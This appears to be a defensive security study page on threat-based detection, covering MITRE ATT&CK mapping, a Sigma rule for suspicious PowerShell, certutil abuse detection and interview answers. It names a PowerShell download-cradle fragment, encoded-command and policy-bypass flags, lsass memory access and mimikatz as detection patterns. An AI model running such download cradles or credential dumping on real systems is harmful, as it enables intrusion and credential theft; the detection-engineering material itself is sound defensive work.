Threat-based detection
Threat-based Detection
One-liner: Detection focused on identifying attacker tactics, techniques, and procedures (TTPs) rather than specific indicators.
๐ฏ What Is It?
Threat-based detection (also called TTP-based or behavioral detection) focuses on detecting how attackers operate, not just what tools they use. Instead of matching specific file hashes or IP addresses (Indicator Detection), threat-based detection identifies the behavioral patterns and techniques described in frameworks like MITRE ATT&CK.
๐ Threat-based vs Indicator-based Detection
| Aspect | Indicator Detection | Threat-based Detection |
|---|---|---|
| What it detects | Specific IOCs (IPs, hashes, domains) | Attacker behaviors (TTPs) |
| Example | Block IP 192.168.1.50 |
Detect process injection |
| Evasion resistance | Low (change hash, change IP) | High (hard to change behavior) |
| Longevity | Days to weeks | Months to years |
| False positives | Lower | Higher (needs tuning) |
| Coverage | Known threats | Known + unknown threats |
Pyramid of Pain
Hardest to Change (Threat-based)
โโโโโโโโโโโ
โ TTPs โ โ Most valuable
โโโโดโโโโโโโโโโดโโโ
โ Tools โ
โโโโดโโโโโโโโโโโโโโโโดโโโ
โ Network Artifacts โ
โโโโดโโโโโโโโโโโโโโโโโโโโโโดโโโ
โ Host Artifacts โ
โโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโดโโโ
โ Domain Names โ
โโดโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโดโ
โ IP Addresses โ โ Easiest to change
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
(Indicator-based)
Attackers easily change IPs and hashes, but changing their TTPs requires retooling and retraining.
๐ฏ MITRE ATT&CK Mapping
Threat-based detection is organized around MITRE ATT&CK tactics and techniques.
Example Detections
T1059.001 - PowerShell Execution
Behavioral Indicators:
- PowerShell spawned by unexpected parent process (e.g.,
winword.exe) - Encoded/obfuscated commands (
-enc,-e) - Remote download cradles (
IEX (New-Object Net.WebClient).DownloadString) - Execution policy bypass (
-ExecutionPolicy Bypass)
Detection Rule:
title: Suspicious PowerShell Execution
detection:
selection:
Image|endswith: '\powershell.exe'
ParentImage|endswith:
- '\winword.exe'
- '\excel.exe'
- '\outlook.exe'
CommandLine|contains:
- '-enc'
- '-executionpolicy bypass'
- 'downloadstring'
condition: selection
T1055 - Process Injection
Behavioral Indicators:
- Process with
PROCESS_VM_WRITEpermission to another process - API calls:
VirtualAllocEx,WriteProcessMemory,CreateRemoteThread - Unsigned process injecting into signed process
T1003 - Credential Dumping
Behavioral Indicators:
- Access to
lsass.exememory procdump.exe,mimikatz, or similar tools- NTLM hash extraction attempts
๐ ๏ธ Building Threat-based Detections
Workflow
1. Study Adversary TTPs
โ
2. Map to MITRE ATT&CK technique
โ
3. Identify behavioral telemetry sources
โ
4. Write Sigma rule or SIEM query
โ
5. Test with Atomic Red Team
โ
6. Tune to reduce FPs
โ
7. Deploy to production
Telemetry Sources
- Sysmon โ Process creation, network connections, registry changes
- Windows Event Logs โ Audit Logon Events, process tracking
- EDR โ API calls, memory access, injection detection
- Zeek โ Network behaviors (C2 beaconing, tunneling)
- Elasticsearch / SIEM โ Correlation across data sources
๐ Detection Coverage Matrix
Track which MITRE ATT&CK techniques you can detect:
| Tactic | Technique | Detection | Coverage |
|---|---|---|---|
| Execution | T1059.001 (PowerShell) | โ High | Process monitoring |
| Defense Evasion | T1070 (Indicator Removal) | โ ๏ธ Medium | File deletion logs |
| Credential Access | T1003 (Credential Dump) | โ High | lsass access |
| Lateral Movement | T1021 (RDP) | โ High | Audit Logon Events |
| Command & Control | T1071 (Web Protocols) | โ ๏ธ Medium | Zeek, proxy logs |
๐ Living Off the Land Detection
Living off the Land attacks use legitimate binaries, making IOC detection useless. Threat-based detection is critical:
Example: Detecting Malicious Use of certutil.exe
Normal Use: Certificate management
Malicious Use: Download payloads
Detection:
- certutil.exe + URL in command line
- certutil.exe spawned by suspicious parent
- certutil.exe + -decode (decoding malware)
๐ Detection Maturity
Threat-based detection represents a mature detection program:
Level 1 (Reactive): Signature/IOC-based only
โ
Level 2 (Proactive): Some behavioral rules
โ
Level 3 (Advanced): Extensive TTP coverage
โ
Level 4 (Leading): Automated threat hunting
๐งช Testing Detections
Validate threat-based detections with:
- Atomic Red Team โ MITRE ATT&CK technique tests
- Purple Teaming โ Collaborative red/blue exercises
- Tabletop Exercise โ Scenario walkthroughs
Example Test:
# Atomic Test: T1059.001 - PowerShell Download Cradle
Invoke-AtomicTest T1059.001 -TestNumbers 1
Verify your detection fires โ Tune โ Repeat.
๐ค Interview Angles
Q: Why is threat-based detection better than signature-based?
- Signatures detect known threats with specific IOCs
- Threat-based detects behaviors, catching variants and zero-days
- Attackers easily change hashes/IPs; changing TTPs requires retooling
- Maps to MITRE ATT&CK for comprehensive coverage
Q: How would you detect Living off the Land attacks?
STAR Example:
Situation: Attacker usedcertutil.exeto download malware (no malicious file hash to block).
Task: Detect this TTP going forward.
Action:
- Mapped to MITRE ATT&CK T1105 (Ingress Tool Transfer)
- Created Sysmon rule detecting
certutil.exe+-urlcache+ external URL- Tested with Atomic Red Team
Result: Detected 3 subsequent attempts usingcertutil,bitsadmin, andmshta.
Q: What's the downside of behavioral detection?
- Higher False Positive rate initially (requires tuning)
- Needs deep understanding of attacker TTPs
- Requires quality telemetry (Sysmon, EDR)
- More complex to build and maintain than simple IOC matching
๐ Related Concepts
- Detection Engineering โ Building detections
- Indicator Detection โ Complementary approach
- Environment-based detection โ Third detection type
- [[MITRE ATT&CK]] โ Framework for TTPs
- [[Sigma]] โ Universal rule format
- [[Atomic Red Team]] โ Testing framework